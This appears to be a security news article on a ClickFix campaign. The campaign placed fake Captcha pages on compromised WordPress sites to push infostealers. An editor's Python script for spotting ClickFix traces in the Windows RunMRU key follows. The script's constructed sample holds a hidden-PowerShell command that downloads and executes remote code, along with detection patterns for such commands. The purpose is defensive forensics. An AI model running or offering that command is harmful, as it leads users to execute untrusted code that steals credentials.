Cyber-Criminal Campaign Compromises WordPress Sites to Deploy Infostealer Malware
A significant cyber-criminal initiative has infiltrated legitimate WordPress websites, infecting unsuspecting visitors with infostealer malware, according to threat researchers at Rapid7.
This extensive operation has affected more than 250 websites, encompassing regional news organizations, local enterprises, and the official webpage of a Senate candidate in the United States.
Impacts have been observed across at least 12 nations, including Australia, Brazil, Canada, Czechia, Germany, India, Israel, Singapore, Slovakia, Switzerland, the UK, and the US.
The attackers aim to manipulate users’ trust in these legitimate platforms to covertly implant infostealer malware, facilitating the theft of sensitive information such as login credentials and financial details.
Active since December 2025, the campaign has raised alarm bells among experts. In a blog post by Rapid7, researchers emphasized the perilous nature of this threat, noting that the exploitation of credible websites heightens risks for both individuals and organizations.
When users visit an infected site, they are confronted with a façade resembling a Cloudflare Captcha page—something they might typically expect. However, this disguise serves a nefarious purpose, initiating the infection sequence.
Fake Captcha and ClickFix Attacks: A Deceptive Tactic
The cybercriminals employ a technique known as ClickFix, a social engineering ploy that uses dialog boxes with fictitious verification prompts to mislead users into copying, pasting, and executing malicious code on their own devices.
In this scenario, the counterfeit Captcha instructs the user to access the Windows Run command interface and paste a specific command under the pretext of enhanced verification. This command orchestrates a multi-stage operation, downloading and installing malware onto the user’s machine.
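Because the ClickFix step described above relies on the victim pasting a command into the Windows Run dialog, Windows itself leaves a forensic trace: Explorer records Run-dialog history under the user's `RunMRU` registry key. The following script is an added example from the editor, not code from Rapid7 or from the article, and it assumes a constructed RunMRU dump (labelled as such in the code) plus a set of heuristic indicator patterns that are the editor's own, not indicators published for this campaign. It parses the MRU ordering, strips the trailing `\1` marker Explorer appends to each entry, and flags commands that match common ClickFix traits such as a hidden PowerShell window, a remote download, or in-memory execution.

```python
import re

# Constructed sample of an exported HKCU RunMRU key (not taken from a real host).
# Explorer stores each Run entry as "<command>\1" and orders the slots in MRUList,
# most recent first.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": 'powershell -w hidden -c "irm https://example.invalid/verify | iex"\\1',
}

# Heuristic indicators (editor's own, case-insensitive) for commands a user would
# not normally type into the Run dialog but that ClickFix lures ask for.
SUSPICIOUS_PATTERNS = [
    (r"\bpowershell\b.*-(?:w|windowstyle)\s*hidden", "hidden PowerShell window"),
    (r"\bmshta\b", "mshta launcher"),
    (r"\b(?:irm|iwr|invoke-webrequest|invoke-restmethod|curl|wget)\b", "remote download"),
    (r"\biex\b|invoke-expression", "in-memory execution"),
    (r"-(?:enc|encodedcommand)\b", "encoded command"),
]


def parse_runmru(values):
    """Return [(slot, command), ...] ordered most recent first, with the '\\1' suffix removed."""
    entries = []
    for slot in values.get("MRUList", ""):
        raw = values.get(slot)
        if raw is None:
            continue
        command = raw[:-2] if raw.endswith("\\1") else raw
        entries.append((slot, command))
    return entries


def classify(command):
    """Return the list of indicator labels that match a single Run-dialog command."""
    return [label for pattern, label in SUSPICIOUS_PATTERNS
            if re.search(pattern, command, re.IGNORECASE)]


def scan(values):
    """Return a finding dict for every RunMRU entry that matches at least one indicator."""
    findings = []
    for slot, command in parse_runmru(values):
        indicators = classify(command)
        if indicators:
            findings.append({"slot": slot, "command": command, "indicators": indicators})
    return findings


def read_live_runmru():
    """Read the current user's RunMRU on a Windows host; returns the same dict shape as the sample."""
    import winreg  # only available on Windows
    path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
    values = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:  # raised once all values have been enumerated
                break
            values[name] = data
            index += 1
    return values


if __name__ == "__main__":
    for finding in scan(SAMPLE_RUNMRU):
        print(f"slot {finding['slot']}: {', '.join(finding['indicators'])}")
        print(f"  {finding['command']}")
```

On a suspected victim machine, `read_live_runmru()` replaces the constructed sample; the same check can be run fleet-wide by collecting `RunMRU` through an EDR or a registry-collection job. Matches are triage leads rather than proof of compromise, since administrators do legitimately type PowerShell one-liners into Run.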
The observed infostealer payloads disseminated via the compromised WordPress sites comprise Vidar Stealer, Impure Stealer, Vodka Stealer, and Double Donut, the latter commonly associated with ClickFix operations.
Regardless of the specific payload employed, the objective remains consistent: to harvest usernames, passwords, digital wallets, and other confidential data from the victim.
The stolen credentials may be exploited by the perpetrators of this campaign or traded on underground forums, facilitating financial fraud or enabling further, more targeted assaults on organizations.
Researchers from Rapid7 cautioned, “The extensive deployment of compromises across disparate WordPress instances indicates a remarkable level of automation by the threat actor and likely signifies an organized, long-term criminal effort.”
The exact methodology through which attackers have breached the targeted WordPress sites remains unclear.
However, Rapid7 speculates that it could involve exploiting vulnerabilities in a WordPress plugin or theme, misusing previously stolen credentials, or gaining access to publicly available admin interfaces through brute-force password attacks.

To assist WordPress site administrators, Rapid7 has provided the following recommendations:
- Regularly audit all software components for outdated versions and conduct vulnerability scans to identify and remediate weaknesses.
- Employ long and unpredictable passwords for administrative access, potentially utilizing a password manager for enhanced security and convenience.
- Implement a secondary authentication factor for administrative access.
- Avoid executing untrusted code on devices that store credentials (e.g., saved logins in a browser) that are necessary for website administration.
Rapid7 has alerted US authorities regarding the compromise of the Senate candidate’s official webpage.
Source link: Infosecurity-magazine.com.